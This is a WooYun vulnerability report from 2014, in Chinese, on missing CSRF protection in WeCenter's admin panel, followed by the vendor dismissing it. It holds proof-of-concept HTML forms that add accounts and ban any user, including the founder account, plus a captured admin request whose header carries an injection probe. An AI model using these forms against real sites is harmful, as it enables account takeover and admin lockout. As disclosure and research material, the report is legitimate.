当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-062763

漏洞标题:WeCenter多处操作没有做必要csrf防御

相关厂商:anwsion.com

漏洞作者: 寂寞的瘦子

提交时间:2014-05-29 17:50

修复时间:2014-08-24 17:52

公开时间:2014-08-24 17:52

漏洞类型:CSRF

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-29: 细节已通知厂商并且等待厂商处理中
2014-05-29: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-07-23: 细节向核心白帽子及相关领域专家公开
2014-08-02: 细节向普通白帽子公开
2014-08-12: 细节向实习白帽子公开
2014-08-24: 细节向公众公开

简要描述:

可能导致跳过审核添加任意用户账号,封禁任意用户账户,包括管理员自己,当然也可以把被管理员封禁的账户解封,继续干坏事~

详细说明:

在后台的地方有个地方可以添加会员,我们抓包看下post出去的字段

QQ图片20140529144940.jpg

很好,和我想的一样,没有做防御,构造一个表单,

<form action="http://127.0.0.1/upload/?/admin/user_manage/user_save_ajax/" method="post">
<input class="form-control" type="text" value="" name="email"><br>
<input class="form-control" type="text" value="" name="user_name"><br>
<input class="form-control" type="password" name="password"><br>
<input calss="form-control" type="text" name="group_id"><br>
<input calss="form-control" type="text" name="_post_type"><br>
<input class="提交" type="submit" name="提交" value="提交">
</form>


本地测试,填写好表单之后提交返回

1.jpg


errno这个字段都很熟悉的吧,1一般就是代表成功,0代表失败。
还能封禁任何账户,还是在封禁的时候抓个包吧

POST /upload/?/admin/user_manage/forbidden_user/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/upload/?/admin/user_manage/list/
Cookie: jtbc_config[language]=chinese; ilm__Session=c2hteqdc90r5n8kvugof2vqf70; ilm__user_login=4trK2MnazeXW2Mulx8_q0snX1dmNp6Xh2-Ht2NXq0cXCkc_Sz7GnsNKrmZeuzs2Yn5-dnNuo3Z-slJyrpJyanqHSjbOe79fev8Ojn4igk7-tytWcx930ytLkzpaalJqMlM_a6NLp2NmYu7uFnJidp5jIycWwlaGY392fmKOanKGRwdPdzNWnn5eWlpqdnKmRwNfsxszn5ZaXn5ic
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 30
uid=9&status=1&_post_type=ajax


也没有做任何防御,只要构造个表单欺骗有管理权限的用户点击就好了
这里的uid代表用户id,status代表是否封禁;
本地测试

<form action="http://127.0.0.1/upload/?/admin/user_manage/forbidden_user/" method="post">
<input class="form-control" type="text" value="" name="uid"><br>
<input class="form-control" type="text" value="" name="status"><br>
<input calss="form-control" type="text" name="_post_type"><br>
<input name="提交" value="提交" type="submit">
</from>


填好表单之后提交,返回{"rsm":null,"errno":1,"err":null}
同理代表成功了。猥琐了试了一下uid为1的账户(创始人账户),表示竟然也成功了。。。如果一个网站就这么一个管理员,后台就进不去了。。。只能去修改数据库了。。
截图为证

111111111140529150158.jpg

漏洞证明:

修复方案:

版权声明:转载请注明来源 寂寞的瘦子@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-08-24 17:52

厂商回复:

此问题需要满足 2 个条件:1. 管理员而且登录了后台, 2. 管理员点击了不明来路的 POST 表单才会生效,危害不大,暂不考虑调整,感谢对 WeCenter 的支持

最新状态:

暂无